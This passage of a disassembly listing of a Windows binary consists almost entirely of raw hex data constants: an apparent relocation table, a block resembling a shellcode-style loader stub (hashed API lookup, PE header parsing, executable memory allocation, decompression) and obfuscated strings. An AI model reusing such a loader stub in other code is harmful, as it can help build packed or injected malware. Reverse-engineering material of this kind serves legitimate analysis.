dd 3D9D3D92h, 3DB13DABh, 3DFD3DDDh, 3EB23E2Fh, 0D000h
dd 0CCh, 30A33075h, 31A9311Eh, 31EA31C5h, 32513243h, 327C325Ah
dd 32C6328Fh, 32F732D0h, 331F3305h, 339A332Fh, 33C033B4h
dd 364033EFh, 36A8369Eh, 36D636C8h, 372D36FEh, 374F3738h
dd 377D3761h, 37C4379Ah, 37E837CBh, 386A380Ch, 38C038B9h
dd 38E638CFh, 39573950h, 397E396Fh, 39A13991h, 39C039A8h
dd 39E239CFh, 39FD39F1h, 3A593A4Fh, 3AE43A85h, 3B2E3B20h
dd 3B443B3Eh, 3B663B4Dh, 3B8B3B83h, 3BB03B94h, 3C013BD8h
dd 3CEA3CBEh, 3D0C3CF8h, 3D2C3D1Eh, 3D503D43h, 3D703D65h
dd 3D9E3D88h, 3DC83DC1h, 3DEA3DE3h, 3DFE3DF7h, 3E703E1Ch
dd 3EAE3E98h, 3ECE3EB8h, 3EF83EE6h, 3F04h, 0E000h, 0A8h
dd 30793011h, 30FD30F4h, 31C331BDh, 31DD31D7h, 32293202h
dd 32A3325Bh, 32C632BBh, 32F832D7h, 3338331Ah, 33AD33A0h
dd 33D933B3h, 33F933F4h, 344A3424h, 3481347Ah, 354834D8h
dd 35AA3550h, 360535B1h, 3612360Ch, 361F3618h, 3655362Dh
dd 3694365Bh, 36A5369Fh, 36DF36D5h, 370436FEh, 3722371Dh
dd 3731372Ah, 381F3752h, 38A53826h, 38DF38D9h, 395F3945h
dd 39933979h, 39E039ADh, 3A1F39FCh, 3A613A56h, 3A8E3A6Bh
dd 3AA83AA2h, 3ACD3ABDh, 3B033AE8h, 3B393B1Eh, 3B6F3B54h
dd 0F000h, 1E0h, 30083004h, 3018300Ch, 3020301Ch, 3030302Ch
dd 30403034h, 30483044h, 3070306Ch, 30803074h, 30883084h
dd 30983094h, 30A8309Ch, 30B030ACh, 30C030BCh, 30D030C4h
dd 30D830D4h, 30E830E4h, 30F830ECh, 310030FCh, 3110310Ch
dd 31203114h, 31283124h, 31383134h
dd 315C313Ch, 31643160h, 31743170h, 31843178h, 318C3188h
dd 31B031ACh, 31C031B4h, 31C831C4h, 31D831D4h, 31E831DCh
dd 31F031ECh, 320031FCh, 32243204h, 322C3228h, 323C3238h
dd 324C3240h, 32543250h, 32643260h, 32743268h, 327C3278h
dd 32A0329Ch, 32C032A4h, 32C832C4h, 32D432D0h, 32E032D8h
dd 32E832E4h, 32F432F0h, 330032F8h, 33083304h, 33143310h
dd 33343318h, 3344333Ch, 3354334Ch, 3364335Ch, 3374336Ch
dd 33A43384h, 33B433ACh, 33C433BCh, 33CC33C8h, 33EC33E8h
dd 340833F0h, 3410340Ch, 34183414h, 3420341Ch, 34283424h
dd 3430342Ch, 34383434h, 3440343Ch, 34483444h, 3450344Ch
dd 34583454h, 3460345Ch, 34683464h, 3470346Ch, 34783474h
dd 3480347Ch, 34883484h, 3490348Ch, 34983494h, 34A0349Ch
dd 34A834A4h, 34B034ACh, 34B834B4h, 34C034BCh, 34C834C4h
dd 34D034CCh, 34D834D4h, 34E034DCh, 34E834E4h, 34F034ECh
dd 34F834F4h, 350034FCh, 35083504h, 3510350Ch, 35183514h
dd 3520351Ch, 35283524h, 3530352Ch, 35383534h, 3540353Ch
dd 35483544h, 3550354Ch, 35583554h, 3560355Ch, 35683564h
dd 3570356Ch, 35783574h, 3580357Ch, 35883584h, 3590358Ch
dd 35983594h, 35A0359Ch, 35A835A4h, 35B035ACh, 35B835B4h
dd 35C035BCh, 39h dup(0)
dd 0BB909090h, 71A10973h, 0F241C3Bh, 18A84h, 0B900h, 31BE0000h
dd 8300409Dh, 1C8B32C6h, 0FE814624h, 409FF3h, 8141F475h
dd 15F90F9h, 8BE37500h, 33662404h, 0FFFF68C0h, 0B6680000h
dd 685D7574h, 71E40722h, 0F8EF8068h, 58EC6815h, 0FC8BD663h
dd 4D388166h, 8B13755Ah, 0FA813C50h, 1000h, 81660877h
dd 4550103Ch, 2D0774h, 0EB000100h, 748B50DFh, 0F0037810h
dd 9318C683h, 50AD50ADh, 0C30350ADh, 8B50AD50h, 104D8BECh
dd 758BD233h, 3368B04h, 50C033F3h, 3107C8C1h, 84AC2404h
dd 58F575C0h, 0FF3F8157h, 740000FFh, 74073B09h, 4C7830Fh
dd 835FEFEBh, 42040445h, 2CEBD0E2h, 4D8BE2D1h, 3CB0300h
dd 81098BCAh, 0FFFFE1h, 0C558B00h, 0E1C1D303h, 8BD10302h
dd 89D30312h, 84D8B17h, 4D89CB03h, 9DEB5F04h, 8B04EF83h
dd 245C8BE7h, 83FC8B08h, 6A5704EFh, 10006840h, 680000h
dd 0FF004000h, 0BFD3h, 7F030040h, 0A087C73Ch, 0
dd 0C7000110h, 0A487h, 118000h, 8087C700h, 0
dd 0C7000000h, 8487h, 0
dd 83D78B00h, 0C93318C2h, 144F8B66h, 3366D103h, 0C728BC9h
dd 0C681h, 8B600040h, 4EF83FCh, 0FF406A57h, 0FF560872h
dd 0C28361D3h, 66416628h, 72064F3Bh, 28EA83DCh, 30C428Bh
dd 51042h, 83004000h, 8B6064C0h, 9D31BEF8h, 0F3B90040h
dd 2B00409Fh, 61A4F3CEh, 0A1097368h, 5EE0FF71h, 409FF305h
dd 9D312D00h, 0D88B0040h, 8B66C033h, 48660647h, 2B28C06Bh
dd 0C93366D0h, 810C728Bh, 400000C6h, 8AC03300h, 60F00306h
dd 1EE8FB8Bh, 8B000000h, 2BFE8B0Eh, 0F3F38BF8h, 0C28361A4h
dd 66416628h, 72064F3Bh, 51B7B8D3h, 0D0FF0040h, 0E3BB60C3h
dd 0B9C5091Eh, 0
dd 0BAh, 0C11E2800h, 834108EBh, 0A7504F9h, 91EE3BBh, 0B9C5h
dd 42460000h, 7C08FA83h, 8B057FE4h, 0C603FC46h, 0D97CF03Bh
dd 0C6836061h, 0FFFFBD08h, 0EBFCFFFFh, 0DB03A405h, 1E8B0775h
dd 13FCEE83h, 33F272DBh, 0DB0340C0h, 1E8B0775h, 13FCEE83h
dd 3C013DBh, 8B0775DBh, 0FCEE831Eh, 0E673DB13h, 0E883C933h
dd 0C10D7203h, 68A08E0h, 0FFF08346h, 0E88B5274h, 775DB03h
dd 0EE831E8Bh, 13DB13FCh, 75DB03C9h, 831E8B07h, 0DB13FCEEh
dd 1D75C913h, 75DB0341h, 831E8B07h, 0DB13FCEEh, 0DB03C913h
dd 1E8B0775h, 13FCEE83h, 41E673DBh, 0FD8141h, 83FFFFF3h
dd 0D68B01D1h, 0F32F348Dh, 0E9F28BA4h, 0FFFFFF72h, 2000C361h
dd 2D40000h, 3A680000h, 3A703A6Ch, 3A783A74h, 3A803A7Ch
dd 3A883A84h, 3A903A8Ch, 3A983A94h, 3AA03A9Ch, 3AA83AA4h
dd 3AB03AACh, 3AB83AB4h, 3AC03ABCh, 3AC83AC4h, 3AD03ACCh
dd 3AD83AD4h, 3AE03ADCh, 3AE83AE4h, 3AF03AECh, 3AF83AF4h
dd 3B003AFCh, 3B083B04h, 3B103B0Ch, 3B183B14h, 3B203B1Ch
dd 3B283B24h, 3B303B2Ch, 3B383B34h, 3B403B3Ch, 3B483B44h
dd 3B503B4Ch, 3B583B54h, 3B603B5Ch, 3B683B64h, 3B703B6Ch
dd 3B783B74h, 3B803B7Ch, 3B883B84h, 3B903B8Ch, 3B983B94h
dd 3BA03B9Ch, 3BA83BA4h, 3BB03BACh, 3BB83BB4h, 3BC03BBCh
dd 3BC83BC4h, 3BD03BCCh, 3BD83BD4h, 3BE03BDCh, 3BE83BE4h
dd 3BF03BECh, 3BF83BF4h, 3C003BFCh, 3C083C04h, 3C103C0Ch
dd 3C183C14h, 3C203C1Ch, 3C283C24h, 3C303C2Ch, 3C383C34h
dd 3C403C3Ch, 3C483C44h, 3C503C4Ch, 3C583C54h, 3C603C5Ch
dd 3C683C64h, 3C703C6Ch, 3C783C74h, 3C803C7Ch, 3C883C84h
dd 3C903C8Ch, 3C983C94h, 3CA03C9Ch, 3CA83CA4h, 3CB03CACh
dd 3CB83CB4h, 3CC03CBCh, 3CC83CC4h, 3CD03CCCh, 3CD83CD4h
dd 3CE03CDCh, 3CE83CE4h, 3CF03CECh, 3CF83CF4h, 3D003CFCh
dd 3D083D04h, 3D103D0Ch, 3D183D14h, 3D203D1Ch, 3D283D24h
dd 3D303D2Ch, 3D383D34h, 3D403D3Ch, 3D483D44h, 3D503D4Ch
dd 3D583D54h, 3D603D5Ch, 3D683D64h, 3D703D6Ch, 3D783D74h
dd 3D803D7Ch, 3D883D84h, 3D903D8Ch, 3D983D94h, 3DA03D9Ch
dd 3DA83DA4h, 3DB03DACh, 3DB83DB4h, 3DC03DBCh, 3DC83DC4h
dd 3DD03DCCh, 3DD83DD4h, 3DE03DDCh, 3DE83DE4h, 3DF03DECh
dd 3DF83DF4h, 3E003DFCh, 3E083E04h, 3E103E0Ch, 3E183E14h
dd 3E203E1Ch, 3E283E24h, 3E303E2Ch, 3E383E34h, 3E403E3Ch
dd 3E483E44h, 3E503E4Ch, 3E583E54h, 3E603E5Ch, 3E683E64h
dd 3E703E6Ch, 3E783E74h, 3E803E7Ch, 3E883E84h, 3E903E8Ch
dd 3E983E94h, 3EA03E9Ch, 3EA83EA4h, 3EB03EACh, 3EB83EB4h
dd 3EC03EBCh, 3EC83EC4h, 3ED03ECCh, 3ED83ED4h, 3EE03EDCh
dd 3EE83EE4h, 3EF03EECh, 3EF83EF4h, 3F003EFCh, 3F083F04h
dd 3F103F0Ch, 3F183F14h, 3F203F1Ch, 3F283F24h, 3F303F2Ch
dd 3F383F34h, 3F403F3Ch, 3F483F44h, 3F503F4Ch, 3F583F54h
dd 3F603F5Ch, 3F683F64h, 3F703F6Ch, 3F783F74h, 3F803F7Ch
dd 3F883F84h, 3F903F8Ch, 3F983F94h, 3FA03F9Ch, 3FA83FA4h
dd 3FB03FACh, 3FB83FB4h, 3FC03FBCh, 3FC83FC4h, 3FD03FCCh
dd 3FD83FD4h, 3FE03FDCh, 3FE83FE4h, 3FF03FECh, 3FF83FF4h
dd 30003FFCh, 1DC0000h, 30000000h, 30083004h, 3010300Ch
dd 30183014h, 3020301Ch, 30283024h, 3030302Ch, 30383034h
dd 3040303Ch, 30483044h, 3050304Ch, 30583054h, 3060305Ch
dd 30683064h, 3070306Ch, 30783074h, 3080307Ch, 30883084h
dd 3090308Ch, 30983094h, 30A0309Ch, 30A830A4h, 30B030ACh
dd 30B830B4h, 30C030BCh, 30C830C4h, 30D030CCh, 30D830D4h
dd 30E030DCh, 30E830E4h, 30F030ECh, 30F830F4h, 310030FCh
dd 31083104h, 3110310Ch, 31183114h, 3120311Ch, 31283124h
dd 3130312Ch, 31383134h, 3140313Ch, 31483144h, 3150314Ch
dd 31603154h, 32953275h, 331332AAh, 333C3325h, 33863351h
dd 33993391h, 33C133B1h, 342033F5h, 34393434h, 3469344Bh
dd 347A3473h, 34B634ABh, 34D834C9h, 34E934DEh, 35263508h
dd 35403538h, 354E3549h, 3578356Dh, 3587357Eh, 35983590h
dd 35A4359Eh, 35B535AFh, 35C535C0h, 35E335D5h, 35F035E9h
dd 363B35F9h, 36523641h, 367F3658h, 37343685h, 3794374Eh
dd 37B937B0h, 37C937C4h, 380937F0h, 386D382Ah, 38BB38ABh
dd 39683962h, 39993982h, 39AB39A6h, 39D139BBh, 39E939D7h
dd 3A723A6Ch, 3A8B3A85h, 3AD43A96h, 3AFC3ADAh, 3B143B0Eh
dd 3B2B3B1Eh, 3B363B30h, 3B433B3Ch, 3B753B5Eh, 3BB03B99h
dd 3BDD3BC6h, 3BFF3BF6h, 3C193C10h, 3C2E3C21h, 3C963C4Fh
dd 3CA83CA2h, 3CD33CB1h, 3D003CE3h, 3D643D16h, 3D983D75h
dd 3DAB3DA0h, 3DE43DC9h, 3E193E03h, 3E703E31h, 3E833E7Bh
dd 3E9B3E89h, 3EC33EACh, 3EDC3ECAh, 3EF43EEBh, 3F4E3F2Eh
dd 3FAC3F63h, 3FB73FB2h, 3FDB3FC2h, 3FF83FF0h, 40000000h
dd 1380000h, 30040000h, 301E3018h, 306A3064h, 30973090h
dd 30B230A9h, 30CA30BFh, 30E730E1h, 310E3103h, 31363114h
dd 314C313Ch, 31583152h, 318A3182h, 324B3195h, 3262325Bh
dd 3282326Eh, 32993293h, 32B532AFh, 32E232DCh, 331832E9h
dd 3347333Eh, 337C3370h, 33B93398h, 33DA33BEh, 33F133EBh
dd 344633FEh, 34A03492h, 34D934D4h, 34ED34E4h, 350F34FAh
dd 35BF3515h, 35E435C5h, 35F335EBh, 360035FAh, 3613360Eh
dd 361E3618h, 364A3644h, 36583650h, 369E3675h, 36B836A4h
dd 36CC36C6h, 36E836D6h, 370236F4h, 370F370Ah, 37273715h
dd 37643750h, 378F3773h, 37D237A7h, 37ED37E0h, 380337FCh
dd 3826380Ah, 383A3832h, 3856384Dh, 38803866h, 388F3889h
dd 38A23895h, 38D938A9h, 38EB38E4h, 391A390Fh, 39273920h
dd 3946392Dh, 39883974h, 39BE39A0h, 3A0939D9h, 3A643A35h
dd 3B633A93h, 3B9E3B75h, 3C4F3BAAh, 3C843C5Ch, 3CEC3CCCh
dd 3D3A3D17h, 3D513D43h, 3D783D5Ch, 3DA33D8Fh, 3E603DAAh
dd 3F223E6Fh, 3FA23F65h, 50000000h, 1440000h, 30A70000h
dd 310F30DAh, 31543144h, 31743169h, 31A13184h, 31BE31ADh
dd 31ED31CEh, 320431FEh, 322D3209h, 3250323Ch, 329D3293h
dd 32AC32A3h, 32E332C1h, 330832F7h, 33323320h, 3371335Ch
dd 33B23376h, 340A33D3h, 34323419h, 34AE3449h, 34D034B7h
dd 34E634D5h, 351934FFh, 3535352Eh, 354D353Eh, 3586356Bh
dd 35A1358Ch, 35BE35AAh, 35DF35C7h, 361B35E4h, 36563647h
dd 36843676h, 36D536C0h, 36EB36E5h, 37143707h, 37253719h
dd 37373732h, 374F3743h, 376B3754h, 37923785h, 37C4379Fh
dd 37D337CDh, 38093804h, 3828380Fh, 3844382Dh, 3852384Ah
dd 386C385Ah, 387A3872h, 38873882h, 389D388Fh, 38C438B1h
dd 38DE38D9h, 38F538F0h, 390D3907h, 393F392Bh, 39603948h
dd 39813965h, 398F3989h, 39AF399Ch, 39CD39C8h, 39E639E0h
dd 39F239ECh, 39FE39F8h, 3A0A3A04h, 3A313A12h, 3A723A64h
dd 3AD83A7Eh, 3B1C3AEFh, 3BC63BB3h, 3C243BFAh, 3C773C41h
dd 3CF53CC1h, 3D3A3D22h, 3D7A3D57h, 3D9D3D96h, 3DF53DD5h
dd 3E583E53h, 3E853E6Ch, 3EC33E9Ch, 60003F97h, 0DC0000h
dd 30060000h
dd 3031300Fh, 304B303Dh, 30AB3086h, 30C330B8h, 30D930D0h
dd 30F130E6h, 31203103h, 3154313Fh, 3164315Eh, 321631E5h
dd 327E321Dh, 32BD32B6h, 332532DEh, 338A3337h, 33B6339Eh
dd 3495345Bh, 354034D5h, 355A3551h, 35B9356Fh, 361835D2h
dd 36EB362Fh, 37183705h, 37633743h, 37BB377Ch, 37F637E3h
dd 3826380Ah, 386A384Dh, 389E3880h, 38BF38AEh, 39513901h
dd 39803957h, 39963986h, 39D239A9h, 3B173ABEh, 3C7C3C5Eh
dd 3CAC3C94h, 3CC53CB7h, 3D4B3CFBh, 3D793D67h, 3DAD3D95h
dd 3DF03DDEh, 3E1C3E15h, 3E423E28h, 3E693E54h, 3EE03E8Dh
dd 3F013EEBh, 3F193F13h, 3F283F22h, 3F603F3Fh, 3F773F6Ch
dd 3F953F84h, 3FCD3FAFh, 70003FE7h, 0F00000h, 305C0000h
dd 308A3077h, 30CB30AEh, 30E230D6h, 30FA30EEh, 31A13106h
dd 31D131C6h, 320131E3h, 32D1326Eh, 32EE32E6h, 330232F5h
dd 33E53344h, 341C33EBh, 34883458h, 34AD34A2h, 34FD34F7h
dd 35633522h, 358A357Ch, 359E3591h, 35B335A6h, 35C835BBh
dd 35DD35D0h, 35F235E5h, 360735FAh, 361C360Fh, 3678366Ch
dd 368C367Fh, 36B036A4h, 36C436B7h, 36D936CCh, 36EE36E1h
dd 370336F6h, 3718370Bh, 372D3720h, 37423735h, 3757374Ah
dd 381437ECh, 382C3822h, 393D38BBh, 3AA4399Bh, 3AEB3AD8h
dd 3B483B05h, 3B8F3B5Bh, 3BAE3BA7h, 3BC83BC1h, 3C453BCEh
dd 3D393C88h, 3D753D5Ah, 3DB33D90h, 3EA03DE8h, 3EAF3EA9h
dd 3F093EF8h, 3F4A3F32h, 3F683F5Fh, 3F893F7Eh, 3F9F3F97h
dd 3FBE3FA6h, 3FE83FD0h, 80000000h, 1100000h, 30240000h
dd 3057304Eh, 3074306Dh, 3144312Ch, 320831D4h, 325C3253h
dd 32823262h, 32933289h, 32A4329Ah, 32DF32ABh, 3393334Eh
dd 33AF33A0h, 33C033BAh, 33DF33C9h, 33FB33E5h, 341D3407h
dd 3445343Ch, 346B3451h, 348E347Ch, 34D334B8h, 34F034E3h
dd 35963503h, 35D1359Ch, 35FD35E5h, 364E3625h, 36973689h
dd 36CD36AEh, 36FE36DEh, 375C3730h, 37683762h, 37793773h
dd 378A3784h, 379B3795h, 37CC37A5h, 37DA37D3h, 37F637EEh
dd 380537FBh, 38203813h, 383C382Dh, 384E3846h, 3866385Eh
dd 3876386Ch, 38873880h, 38A9389Ah, 38B938AFh, 38C738BFh
dd 38D338CDh, 38DE38D9h, 39403909h, 3995398Fh, 3A1039C4h
dd 3A2F3A1Ch, 3A3E3A37h, 3A5F3A4Dh, 3A903A75h, 3AC13A9Eh
dd 3AFB3AD4h, 3B343B08h, 3B6A3B41h, 3BBD3B80h, 3C123BC6h
dd 3C343C26h, 3C453C40h, 3C713C4Bh, 3C933C89h, 3CA33C99h
dd 90000000h, 0DC0000h, 31950000h, 31B9319Dh, 31DB31C0h
dd 31F131EAh, 32583220h, 33093263h, 3326330Fh, 33DF332Ch
dd 33F433E6h, 3412340Ch, 3426341Eh, 34453430h, 348F346Ch
dd 350834D6h, 353E3526h, 35573546h, 35733561h, 3595357Ch
dd 35EA35A3h, 361D3602h, 36523639h, 3685366Ch, 36CF36A2h
dd 39C33707h, 3B3439EFh, 3B503B3Eh, 3B613B56h, 3B853B73h
dd 3B963B8Fh, 3BA33B9Ch, 3BC33BAAh, 3C123BFCh, 3C683C48h
dd 3C803C77h, 3CA63C98h, 3CC43CB4h, 3D0D3CDDh, 3D603D33h
dd 3D7C3D67h, 3DA93D88h, 3DCB3DB1h, 3DFB3DEBh, 3E1E3E02h
dd 3E803E3Fh, 3EA03E91h, 3EC53EAFh, 3EEA3ED3h, 3F0D3EFBh
dd 3F403F31h, 3F853F6Ah, 3FAF3FA7h, 3FC33FB9h, 3FEE3FD4h
dd 0A0003FFFh, 1800000h, 30130000h, 30333024h, 304A303Eh
dd 30633057h, 30863079h, 30963091h, 30B430A7h, 30D130BFh
dd 30DD30D8h, 30F030EBh, 310430FFh, 3119310Eh, 314E3124h
dd 31893167h, 31C931B3h, 320631EEh, 32383221h, 3259324Fh
dd 3282327Bh, 32A73297h, 330F32BBh, 335D332Ah, 3386336Ch
dd 339B338Ch, 33CB33A8h, 341A33DFh, 348F343Ch, 35313508h
dd 355D3558h, 3578356Ch, 358C357Dh, 35A4359Fh, 35C035B3h
dd 35D435C5h, 35E635E1h, 360735F5h, 361B360Ch, 362D3628h
dd 364E363Ch, 36623653h, 36793674h, 36963688h, 36AA369Bh
dd 36B836B3h, 36D536C7h, 36E936DAh, 37393713h, 37AD3760h
dd 37F237D1h, 38BD380Ah, 393C3936h, 39C539ABh, 39EC39D2h
dd 3A0339F7h, 3A153A0Ch, 3A383A2Dh, 3A6F3A53h, 3A803A77h
dd 3AB13A89h, 3ABD3AB7h, 3ACC3AC2h, 3B003AE4h, 3B2A3B12h
dd 3B503B3Ch, 3B723B5Eh, 3B8F3B86h, 3B993B94h, 3BA93BA0h
dd 3BC33BAFh, 3BD43BCAh, 3BE63BE0h, 3BF63BF0h, 3C093BFCh
dd 3C3F3C13h, 3C523C45h, 3C613C5Bh, 3C7C3C67h, 3CF43CC5h
dd 3D1E3D06h, 3D4B3D2Bh, 3D723D69h, 3D823D7Ch, 3DA13D8Ch
dd 3DC93DB2h, 3DEB3DDCh, 3E183DF4h, 3E683E45h, 3E953E81h
dd 3EC23EB0h, 3ED73ED2h, 3F0C3EF4h, 3F3B3F21h, 3F783F59h
dd 3FFC3FC3h, 0B0000000h, 1100000h, 30070000h, 30243015h
dd 303A3033h, 3093308Ch, 30B530A2h, 30DD30CDh, 310630E4h
dd 312D3111h, 3145313Ch, 31C93179h, 32FD31E7h, 3345330Dh
dd 34AD340Dh, 34CB34B8h, 34E434DAh, 34F334ECh, 350234F8h
dd 35183512h, 353E3530h, 35493544h, 3559354Fh, 356E3567h
dd 359B3576h, 35B335A7h, 35E735BAh, 35FC35F5h, 36103607h
dd 364B3624h, 368F3656h, 36AF369Fh, 36CB36BEh, 36FC36EFh
dd 37193705h, 375E3742h, 37883768h, 37AB378Eh, 37D637BCh
dd 380837F3h, 3816380Fh, 3829381Dh, 389D382Eh, 38C738B6h
dd 38E638D4h, 390E3901h, 3945392Fh, 3984396Ch, 39D639BEh
dd 39F739ECh, 3B9D3B8Ch, 3BAD3BA6h, 3BCA3BBCh, 3BFE3BEAh
dd 3CA83C27h, 3CC03CB9h, 3CE73CCCh, 3D153D10h, 3D433D2Fh
dd 3D7A3D51h, 3DCC3D80h, 3DE03DD2h, 3E5E3E19h, 3E9C3E79h
dd 3ED23EABh, 3F043EF3h, 3F133F0Ch, 3F2D3F20h, 0C0003F4Ch
dd 0B80000h, 301F0000h, 30343024h, 3058303Bh, 3084306Dh
dd 30DD30D8h, 312730E3h, 31383132h, 31603146h, 3177316Ch
dd 322B321Fh, 32D532A7h, 32F932E2h, 3313330Eh, 33603322h
dd 3415339Bh, 34803468h, 351C34E1h, 35263521h, 3530352Bh
dd 353E3536h, 356B354Ah, 35A03579h, 35BC35B6h, 362135C7h
dd 3633362Ah, 36713664h, 3699367Bh, 36A936A0h, 370F36B2h
dd 373A371Ah, 37703743h, 383337E9h, 390D3877h, 3AEC3AC0h
dd 3B193B0Dh, 3C623B2Ch, 3CDE3CA3h, 3D463CF7h, 3D673D53h
dd 3D823D6Eh, 3D923D87h, 3DAB3D9Dh, 3DDD3DB1h, 3E2F3DFDh
dd 0D0003EB2h, 0CC0000h, 30750000h, 311E30A3h, 31C531A9h
dd 324331EAh, 325A3251h, 328F327Ch, 32D032C6h, 330532F7h
dd 332F331Fh, 33B4339Ah, 33EF33C0h, 369E3640h, 36C836A8h
dd 36FE36D6h, 3738372Dh, 3761374Fh, 379A377Dh, 37CB37C4h
dd 380C37E8h, 38B9386Ah, 38CF38C0h, 395038E6h, 396F3957h
dd 3991397Eh, 39A839A1h, 39CF39C0h, 39F139E2h, 3A4F39FDh
dd 3A853A59h, 3B203AE4h, 3B3E3B2Eh, 3B4D3B44h, 3B833B66h
dd 3B943B8Bh, 3BD83BB0h, 3CBE3C01h, 3CF83CEAh, 3D1E3D0Ch
dd 3D433D2Ch, 3D653D50h, 3D883D70h, 3DC13D9Eh, 3DE33DC8h
dd 3DF73DEAh, 3E1C3DFEh, 3E983E70h, 3EB83EAEh, 3EE63ECEh
dd 3F043EF8h, 0E0000000h, 0A80000h, 30110000h, 30F43079h
dd 31BD30FDh, 31D731C3h, 320231DDh, 325B3229h, 32BB32A3h
dd 32D732C6h, 331A32F8h, 33A03338h, 33B333ADh, 33F433D9h
dd 342433F9h, 347A344Ah
dd 34D83481h, 35503548h, 35B135AAh, 360C3605h, 36183612h
dd 362D361Fh, 365B3655h, 369F3694h, 36D536A5h, 36FE36DFh
dd 371D3704h, 372A3722h, 37523731h, 3826381Fh, 38D938A5h
dd 394538DFh, 3979395Fh, 39AD3993h, 39FC39E0h, 3A563A1Fh
dd 3A6B3A61h, 3AA23A8Eh, 3ABD3AA8h, 3AE83ACDh, 3B1E3B03h
dd 3B543B39h, 0F0003B6Fh, 1E00000h, 30040000h, 300C3008h
dd 301C3018h, 302C3020h, 30343030h, 30443040h, 306C3048h
dd 30743070h, 30843080h, 30943088h, 309C3098h, 30AC30A8h
dd 30BC30B0h, 30C430C0h, 30D430D0h, 30E430D8h, 30EC30E8h
dd 30FC30F8h, 310C3100h, 31143110h, 31243120h, 31343128h
dd 313C3138h, 3160315Ch, 31703164h, 31783174h, 31883184h
dd 31AC318Ch, 31B431B0h, 31C431C0h, 31D431C8h, 31DC31D8h
dd 31EC31E8h, 31FC31F0h, 32043200h, 32283224h, 3238322Ch
dd 3240323Ch, 3250324Ch, 32603254h, 32683264h, 32783274h
dd 329C327Ch, 32A432A0h, 32C432C0h, 32D032C8h, 32D832D4h
dd 32E432E0h, 32F032E8h, 32F832F4h, 33043300h, 33103308h
dd 33183314h, 333C3334h, 334C3344h, 335C3354h, 336C3364h
dd 33843374h, 33AC33A4h, 33BC33B4h, 33C833C4h, 33E833CCh
dd 33F033ECh, 340C3408h, 34143410h, 341C3418h, 34243420h
dd 342C3428h, 34343430h, 343C3438h, 34443440h, 344C3448h
dd 34543450h, 345C3458h, 34643460h, 346C3468h, 34743470h
dd 347C3478h, 34843480h, 348C3488h, 34943490h, 349C3498h
dd 34A434A0h, 34AC34A8h, 34B434B0h, 34BC34B8h, 34C434C0h
dd 34CC34C8h, 34D434D0h, 34DC34D8h, 34E434E0h, 34EC34E8h
dd 34F434F0h, 34FC34F8h, 35043500h, 350C3508h, 35143510h
dd 351C3518h, 35243520h, 352C3528h, 35343530h, 353C3538h
dd 35443540h, 354C3548h, 35543550h, 355C3558h, 35643560h
dd 356C3568h, 35743570h, 357C3578h, 35843580h, 358C3588h
dd 35943590h, 359C3598h, 35A435A0h, 35AC35A8h, 35B435B0h
dd 35BC35B8h, 35C0h, 1Fh dup(0)
db 0
align 2
dw 0A675h
db 0
align 2
aNiDEAknvxe db 0Dh,'©¶„°¥°Š¢•…',0
align 2
dw 8D10h
aIMnggicavvcvpi db '©¶Œ££›— v¢—¢›',0
db 0
align 2
dw 8D0Fh
aIGnizsdsSSk db '©¶ƒ©§™¤˜~™œ‘k',0
align 10h
db 0
align 2
dw 870Eh
db 97h ; —
db 8Dh, 89h, 8Eh
db 8Ch ; Œ
db 7Fh, 7Ch, 56h
aIsHl db 'ˆs~hL',0
dw 870Eh
db 8Bh ; ‹
db 94h, 81h, 80h
db 7Eh ; ~
db 7Fh, 7Ch, 56h
aIsHl_0 db 'ˆs~hL',0
dw 9D1Ch
db 0A7h ; §
db 0A7h, 2 dup(0B2h)
db 0AFh ; ¯
db 96h, 5Dh, 0A9h
db 93h ; “
db 57h, 2 dup(60h)
dd 564D89A1h, 437F9756h, 448D4E4Ch, 887884h, 9D030000h
dd 9B91h, 9D050000h, 0B1B3A3B4h, 9D130000h, 0A3ACABAAh
dd 0A8999FAFh, 538C9A97h, 8580605Ch, 9549h, 9D3C0000h
dd 0B2A6B1B7h, 9BAA9BB3h, 91999F90h, 959B999Eh, 957C968Ah
dd 857C8885h, 716C858Bh, 6B7A7C81h, 63767672h, 65616D6Eh
dd 66554E62h, 5857565Ch, 413C5449h, 423C474Bh, 2053Bh
dd 87060000h, 0B1ACA7A8h, 870600A2h, 0B1A4A6A5h, 870800A2h
dd 0A4B4A7ABh, 9DA6A5h, 9D050000h, 0A4B5706Eh, 9D080000h
dd 96787269h, 9EAF6Ah, 871A0000h, 0A0A1B48Bh, 569C9F9Eh
dd 8FA49398h, 959A904Ch, 43405C91h, 3B22248Fh, 87120087h
dd 0A3A3A585h, 7B65AEACh, 929F95A2h, 608F9895h, 9D12002Eh
dd 0B4A9B4A8h, 92ABACA1h, 8A93A699h, 9A9B9994h, 87110097h
dd 78B56795h, 40AB5F5Ch, 68A55775h, 309B4F4Ch, 87120000h
dd 7F869186h, 0A9A69B5Ch, 0A1A297ABh, 4B323466h, 872C0097h
dd 0B2B3B787h, 0A89DA7ABh, 0A4A29787h, 738D8D95h, 63959089h
dd 8F8A8E8Ah, 7C798164h, 7B6B4980h, 61417677h, 64676370h
dd 252931h, 87400000h, 0AEB4B6ACh, 656774AFh, 979CA0A3h
dd 878D8F9Ah, 4C439697h, 81867B7Eh, 7B717883h, 69717C71h
dd 6D633065h, 5D5B2969h, 57521F5Dh, 4751195Ah, 0D0A1157h
dd 454C4923h, 313C372Bh, 2D373Bh, 87050000h, 71B0B1B4h
dd 87040000h, 0B0B6AAh, 871B0000h, 6D7AB569h, 70AB5F6Bh
dd 5370A559h, 9B4D58A1h, 4C954752h, 3B528F41h, 4189h, 870A0000h
dd 0ACAFB0A5h, 0ABA7A7B5h, 870500A7h, 92938B90h, 87050000h
dd 92819697h, 87050000h, 94938394h, 87050000h, 9281878Ah
dd 87050000h, 83909B98h, 87070000h, 0B1B9A78Fh, 5A76h
dd 871A0000h, 0B2AEB187h, 63ACA8A1h, 93A0AB88h, 994D4A66h
dd 67637C2Eh, 3B385460h, 871B0087h, 904AB569h, 0A89DA0A1h
dd 4E6AA499h, 4B329D51h, 92816697h, 2022547Dh, 8539h, 87220000h
dd 0AAB0B2A5h, 0AA999DA5h, 5D9EA19Dh, 9D9F57A4h, 8D864F9Bh
dd 8B45878Eh, 7C757E86h, 6B6C796Fh, 87150068h, 0ADB49594h
dd 0A87B9FAEh, 93A49399h, 9A9B9875h, 83839085h, 87060000h
dd 0B2B0AF89h, 870D00B5h, 0A2609594h, 7099AE9Dh, 0A1553C3Eh
dd 9D0C0000h, 0B0B4957Eh, 7A9FA8A5h, 91A695h, 870C0000h
dd 0ADB4B5B4h, 649B9FAEh, 9C9E98h, 9D080000h, 0A9AFB1A7h
